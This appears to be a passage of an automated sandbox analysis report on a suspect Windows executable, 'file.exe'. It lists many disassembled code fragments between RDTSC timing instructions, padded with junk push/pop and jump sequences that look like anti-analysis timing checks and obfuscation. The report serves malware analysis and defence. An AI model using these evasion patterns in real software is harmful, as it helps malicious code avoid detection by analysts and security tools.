                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730CF5 second address: 730D67 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FD3C5224488h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 movsx edx, si 0x00000028 mov edx, dword ptr [ebp+1244C0DEh] 0x0000002e lea eax, dword ptr [ebp+12481826h] 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FD3C5224488h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 0000001Ah 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e mov dx, 0224h 0x00000052 push eax 0x00000053 pushad 0x00000054 jne 00007FD3C5224488h 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730D67 second address: 70FD1C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD3C500B9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e jns 00007FD3C500B9D6h 0x00000014 lea eax, dword ptr [ebp+124817E2h] 0x0000001a jg 00007FD3C500B9DDh 0x00000020 push eax 0x00000021 jmp 00007FD3C500B9E5h 0x00000026 mov dword ptr [esp], eax 0x00000029 sub dword ptr [ebp+1244AB7Bh], edx 0x0000002f call dword ptr [ebp+1244AD5Dh] 0x00000035 push ebx 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 768C42 second address: 768C55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C522448Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 768C55 second address: 768CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FD3C500B9DCh 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FD3C500B9E8h 0x00000017 pop ecx 0x00000018 pushad 0x00000019 jmp 00007FD3C500B9E7h 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 768CA2 second address: 768CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 768E09 second address: 768E21 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD3C500B9E2h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 768E21 second address: 768E3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C5224494h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76959E second address: 7695A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76DB57 second address: 76DB5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76DB5C second address: 76DB62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7710CE second address: 7710D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7710D4 second address: 7710D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7710D8 second address: 7710DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773B11 second address: 773B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773B15 second address: 773B3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C5224496h 0x00000007 jl 00007FD3C5224486h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnc 00007FD3C5224486h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773B3E second address: 773B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7736DE second address: 7736E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77ACF1 second address: 77ACF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77ACF5 second address: 77AD0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C522448Ah 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AD0B second address: 77AD0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AD0F second address: 77AD13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AD13 second address: 77AD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C500B9DCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD3C500B9E8h 0x00000011 jbe 00007FD3C500B9D6h 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7798DA second address: 7798E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7798E0 second address: 7798EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD3C500B9D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779BC1 second address: 779BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779BC7 second address: 779BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779BCF second address: 779BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779BD3 second address: 779BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779BD7 second address: 779BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779BDD second address: 779BE7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD3C500B9DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779BE7 second address: 779C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FD3C522449Ah 0x0000000d je 00007FD3C5224492h 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7307E9 second address: 730816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD3C500B9E2h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD3C500B9E1h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779D96 second address: 779D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779D9C second address: 779DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779EF7 second address: 779F21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FD3C52244A2h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779F21 second address: 779F63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C500B9E3h 0x00000007 jmp 00007FD3C500B9E0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD3C500B9E7h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779F63 second address: 779F69 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779F69 second address: 779F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FD3C500B9F2h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779F91 second address: 779F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779F97 second address: 779FAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C500B9DFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AA1F second address: 77AA23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AA23 second address: 77AA31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AA31 second address: 77AA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AA35 second address: 77AA44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007FD3C500B9D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DBFE second address: 77DC1F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD3C522448Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jns 00007FD3C5224488h 0x00000011 js 00007FD3C522448Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EB122 second address: 6EB12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD3C500B9D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D5CD second address: 77D5D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D5D1 second address: 77D5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FD3C500B9DDh 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D5E8 second address: 77D615 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C522448Bh 0x00000007 jmp 00007FD3C5224499h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D615 second address: 77D640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C500B9E2h 0x00000009 jmp 00007FD3C500B9DAh 0x0000000e js 00007FD3C500B9D6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D640 second address: 77D652 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C522448Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780DDB second address: 780DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780F0F second address: 780F1C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD3C5224486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780F1C second address: 780F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C500B9DEh 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780F31 second address: 780F50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FD3C5224499h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7810E4 second address: 7810EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7810EA second address: 7810F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7810F0 second address: 7810F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7810F4 second address: 78110C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FD3C5224488h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781276 second address: 78127B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7813D5 second address: 7813D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7813D9 second address: 7813DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7813DD second address: 7813E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7813E8 second address: 7813FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD3C500B9D6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FD3C500B9D6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7813FD second address: 781403 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781565 second address: 781582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jne 00007FD3C500B9E2h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781582 second address: 781586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788F36 second address: 788F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788F3A second address: 788F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788F40 second address: 788F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD3C500B9DCh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788F52 second address: 788F65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FD3C5224486h 0x00000009 jbe 00007FD3C5224486h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786F67 second address: 786F77 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD3C500B9E2h 0x00000008 jng 00007FD3C500B9D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786F77 second address: 786F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786F7E second address: 786F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7870D5 second address: 7870DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7870DB second address: 7870ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD3C500B9DBh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7870ED second address: 7870F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787266 second address: 787271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD3C500B9D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787271 second address: 787277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787277 second address: 787281 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD3C500B9D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7882CE second address: 7882F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C522448Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push ecx 0x0000000b jmp 00007FD3C5224492h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7882F6 second address: 7882FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7882FC second address: 788300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7885B0 second address: 7885CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD3C500B9E4h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78890A second address: 788917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FD3C5224486h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CA9F second address: 78CAAA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CAAA second address: 78CABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FD3C5224486h 0x0000000d jne 00007FD3C5224486h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D084 second address: 78D088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D088 second address: 78D097 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD3C5224486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D097 second address: 78D09D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D657 second address: 78D66B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jnp 00007FD3C5224486h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D66B second address: 78D6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C500B9E6h 0x00000009 jmp 00007FD3C500B9E2h 0x0000000e popad 0x0000000f jng 00007FD3C500B9DCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799E84 second address: 799EB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C522448Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007FD3C5224486h 0x00000010 jmp 00007FD3C5224496h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A132 second address: 79A141 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C500B9DBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A141 second address: 79A14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B3D3 second address: 79B3D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B3D7 second address: 79B3DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B3DF second address: 79B403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C500B9E9h 0x00000007 pushad 0x00000008 ja 00007FD3C500B9D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
